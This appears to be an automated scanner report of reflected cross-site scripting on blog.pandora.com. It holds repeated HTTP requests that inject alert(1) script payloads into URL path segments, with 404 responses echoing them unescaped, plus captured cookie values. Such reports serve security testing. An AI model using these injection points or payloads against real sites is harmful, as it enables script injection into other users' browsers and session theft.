The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c021<script>alert(1)</script>00e0120b037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5c021<script>alert(1)</script>00e0120b037/2009/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5c021<script>alert(1)</script>00e0120b037/2009/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7c9b0<script>alert(1)</script>b9522db024f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097c9b0<script>alert(1)</script>b9522db024f/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20097c9b0<script>alert(1)</script>b9522db024f/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9e75b<script>alert(1)</script>e4d44414054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/129e75b<script>alert(1)</script>e4d44414054/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/129e75b<script>alert(1)</script>e4d44414054/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc983<script>alert(1)</script>2400c298808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracc983<script>alert(1)</script>2400c298808/archives/2010/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoracc983<script>alert(1)</script>2400c298808/archives/2010/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8de66<script>alert(1)</script>475006746a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8de66<script>alert(1)</script>475006746a0/2010/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8de66<script>alert(1)</script>475006746a0/2010/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2e9cf<script>alert(1)</script>65e022c3582 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20102e9cf<script>alert(1)</script>65e022c3582/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:45 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20102e9cf<script>alert(1)</script>65e022c3582/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61fb7<script>alert(1)</script>7b57931b113 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0161fb7<script>alert(1)</script>7b57931b113/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0161fb7<script>alert(1)</script>7b57931b113/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b45c8<script>alert(1)</script>6c1d1e3fb41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab45c8<script>alert(1)</script>6c1d1e3fb41/archives/2010/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorab45c8<script>alert(1)</script>6c1d1e3fb41/archives/2010/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c321c<script>alert(1)</script>4ec169aa6ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc321c<script>alert(1)</script>4ec169aa6ab/2010/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc321c<script>alert(1)</script>4ec169aa6ab/2010/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fa813<script>alert(1)</script>ceeadd94af1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010fa813<script>alert(1)</script>ceeadd94af1/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010fa813<script>alert(1)</script>ceeadd94af1/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57830<script>alert(1)</script>60d006b3a3f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0257830<script>alert(1)</script>60d006b3a3f/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0257830<script>alert(1)</script>60d006b3a3f/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23646<script>alert(1)</script>c3ee8c2d938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora23646<script>alert(1)</script>c3ee8c2d938/archives/2010/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora23646<script>alert(1)</script>c3ee8c2d938/archives/2010/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b658<script>alert(1)</script>a757f005820 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives1b658<script>alert(1)</script>a757f005820/2010/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives1b658<script>alert(1)</script>a757f005820/2010/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 490a0<script>alert(1)</script>2b229393208 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010490a0<script>alert(1)</script>2b229393208/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010490a0<script>alert(1)</script>2b229393208/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8018f<script>alert(1)</script>0037f1ec75a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/038018f<script>alert(1)</script>0037f1ec75a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/038018f<script>alert(1)</script>0037f1ec75a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb4ba<script>alert(1)</script>cf73c74ede8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabb4ba<script>alert(1)</script>cf73c74ede8/archives/2010/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabb4ba<script>alert(1)</script>cf73c74ede8/archives/2010/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d94d<script>alert(1)</script>f0d1317d4a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5d94d<script>alert(1)</script>f0d1317d4a9/2010/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5d94d<script>alert(1)</script>f0d1317d4a9/2010/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c7e3f<script>alert(1)</script>451f1300ac6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010c7e3f<script>alert(1)</script>451f1300ac6/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010c7e3f<script>alert(1)</script>451f1300ac6/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb7b3<script>alert(1)</script>c9a6d62cd0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/04cb7b3<script>alert(1)</script>c9a6d62cd0b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/04cb7b3<script>alert(1)</script>c9a6d62cd0b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5cc96<script>alert(1)</script>7c02a0cfd8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5cc96<script>alert(1)</script>7c02a0cfd8a/archives/2010/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
